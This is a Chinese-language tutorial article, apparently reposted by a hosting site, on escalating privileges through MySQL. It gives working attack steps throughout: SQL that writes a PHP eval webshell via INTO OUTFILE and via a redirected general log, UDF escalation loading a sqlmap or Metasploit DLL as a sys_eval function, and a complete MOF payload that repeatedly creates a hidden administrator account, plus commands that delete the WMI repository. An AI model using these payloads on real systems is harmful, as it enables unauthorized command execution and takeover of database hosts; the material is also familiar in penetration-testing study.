一、寫入Webshell

into outfile 寫shell

前提條件：

1、知道網(wǎng)站物理路徑

2、高權(quán)限數(shù)據(jù)庫用戶

3、load_file() 開啟 即 secure_file_priv 無限制

4、網(wǎng)站路徑有寫入權(quán)限

首先基礎(chǔ)語法查詢是否 secure_file_priv 沒有限制

show global variables like '%secure_file_priv%';

在 MySQL 5.5 之前 secure_file_priv 默認(rèn)是空，這個情況下可以向任意絕對路徑寫文件

在 MySQL 5.5之后 secure_file_priv 默認(rèn)是 NULL，這個情況下不可以寫文件

如果滿足上述所有條件的話，那么可以嘗試使用下面的 SQL 語句來直接寫 shell：

select '<?php @eval($_POST[cmd]); ?>' into outfile 'C:\\soft\\WWW\\empirecms\\shell.php';

查看目標(biāo)路徑下，已寫入shell.php文件

上菜刀連接

日志文件寫shell

前提條件：

1、Web 文件夾寬松權(quán)限可以寫入

2、Windows 系統(tǒng)下

3、高權(quán)限運行 MySQL 或者 Apache

MySQL 5.0 版本以上會創(chuàng)建日志文件，可以通過修改日志的全局變量來 getshell

查看日志目錄

SHOW VARIABLES LIKE 'general%';

general_log 默認(rèn)關(guān)閉，開啟它可以記錄用戶輸入的每條命令，會把其保存在對應(yīng)的日志文件中。
可以嘗試自定義日志文件，并向日志文件里面寫入內(nèi)容的話，那么就可以成功 getshell：

更改日志文件位置

set global general_log = "ON";
set global general_log_file='C:\\soft\\WWW\\empirecms\\log.php';

查看當(dāng)前日志配置

目標(biāo)目錄下查看，寫入了log.php文件

寫入shell

select '<?php @eval($_POST[cmd]); ?>'

上菜刀，連接

二、UDF提權(quán)

自定義函數(shù)，是數(shù)據(jù)庫功能的一種擴展。用戶通過自定義函數(shù)可以實現(xiàn)在 MySQL 中無法方便實現(xiàn)的功能，其添加的新函數(shù)都可以在SQL語句中調(diào)用，就像調(diào)用本機函數(shù) version() 等方便。

動態(tài)鏈接庫

如果是 MySQL >= 5.1 的版本，必須把 UDF 的動態(tài)鏈接庫文件放置于 MySQL 安裝目錄下的 lib\plugin 文件夾下文件夾下才能創(chuàng)建自定義函數(shù)。

那么動態(tài)鏈接庫文件去哪里找呢？實際上我們常用的工具 sqlmap 和 Metasploit 里面都自帶了對應(yīng)系統(tǒng)的動態(tài)鏈接庫文件。

sqlmap的UDF動態(tài)鏈接庫文件位置

sqlmap根目錄/data/udf/mysql

不過 sqlmap 中 自帶這些動態(tài)鏈接庫為了防止被誤殺都經(jīng)過編碼處理過，不能被直接使用。不過可以利用 sqlmap 自帶的解碼工具cloak.py 來解碼使用，cloak.py 的位置為：sqlmap根目錄/extra/cloak/cloak.py ，

解碼方法如下:

解碼32位的windows動態(tài)鏈接庫：

python3 cloak.py -d -i lib_mysqludf_sys.dll_ -o lib_mysqludf_sys_32.dll

其他linux和windows動態(tài)鏈接庫解碼類似

或者直接使用metasploit自帶的動態(tài)鏈接庫，無需解碼

Metasploit的UDF動態(tài)鏈接庫文件位置

接下來的任務(wù)是把 UDF 的動態(tài)鏈接庫文件放到 MySQL 的插件目錄下，這個目錄改如何去尋找呢？可以使用如下的 SQL 語句來查詢：

show variables like '%plugin%'

寫入動態(tài)鏈接庫

當(dāng) secure_file_priv 無限制的時候，我們可以手工寫文件到 plugin 目錄下的

select load_file('C:\\soft\\UDFmysql\\lib_mysqludf_sys_32.dll')  into dumpfile 'C:\\soft\\MySQL\\lib\\plugin\\udf.dll';

c

創(chuàng)建自定義函數(shù)并調(diào)用命令

創(chuàng)建自定義函數(shù)

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.dll';

查看是否新增了sys_eval

接著就可以通過創(chuàng)建的這個函數(shù)來執(zhí)行系統(tǒng)命令了：

刪除自定義函數(shù)

drop function sys_eval;

三、MOF提權(quán)

mof提權(quán)原理

關(guān)于 mof 提權(quán)的原理其實很簡單，就是利用了 c:/windows/system32/wbem/mof/ 目錄下的 nullevt.mof 文件，每分鐘都會在一個特定的時間去執(zhí)行一次的特性，來寫入我們的cmd命令使其被帶入執(zhí)行。

嚴(yán)苛的前提條件：

1.windows 03及以下版本

2.mysql啟動身份具有權(quán)限去讀寫c:/windows/system32/wbem/mof目錄

3.secure-file-priv參數(shù)不為null

提權(quán)過程：

MOF文件每五秒就會執(zhí)行，而且是系統(tǒng)權(quán)限，我們通過mysql使用load_file 將文件寫入/wbme/mof，然后系統(tǒng)每隔五秒就會執(zhí)行一次我們上傳的MOF。MOF當(dāng)中有一段是vbs腳本，我們可以通過控制這段vbs腳本的內(nèi)容讓系統(tǒng)執(zhí)行命令，進(jìn)行提權(quán)。

利用代碼如下（test.mof）：

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")\nWSH.run(\"net.exe localgroup administrators hpdoger /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

MOF文件利用:

將上面的腳本上傳到有讀寫權(quán)限的目錄下：

這里我上傳到了C:\soft\，我們使用sql語句將文件導(dǎo)入到c:/windows/system32/wbem/mof/下

select load_file("C:/soft/test.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"

驗證提權(quán)：

當(dāng)我們成功把mof導(dǎo)出時，mof就會直接被執(zhí)行，且5秒創(chuàng)建一次用戶。

關(guān)于MOF提權(quán)弊端

我們提權(quán)成功后，就算被刪號，mof也會在五秒內(nèi)將原賬號重建，那么這給我們退出測試造成了很大的困擾，所以謹(jǐn)慎使用。那么我們?nèi)绾蝿h掉我們的入侵賬號呢？

cmd 下運行下面語句:

#停止winmgmt服務(wù)
net stop winmgmt
#刪除 Repository 文件夾
rmdir /s /q C:\Windows\system32\wbem\Repository\
# 手動刪除 mof 文件
del c:/windows/system32/wbem/mof/nullevt.mof /F /S
# 刪除創(chuàng)建的用戶
net user hpdoger /delete
#重啟服務(wù)
net start winmgmt

總結(jié)

到此這篇關(guān)于Mysql提權(quán)姿勢的文章就介紹到這了,更多相關(guān)Mysql提權(quán)姿勢內(nèi)容請搜索本站以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持本站！

海外服務(wù)器租用

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。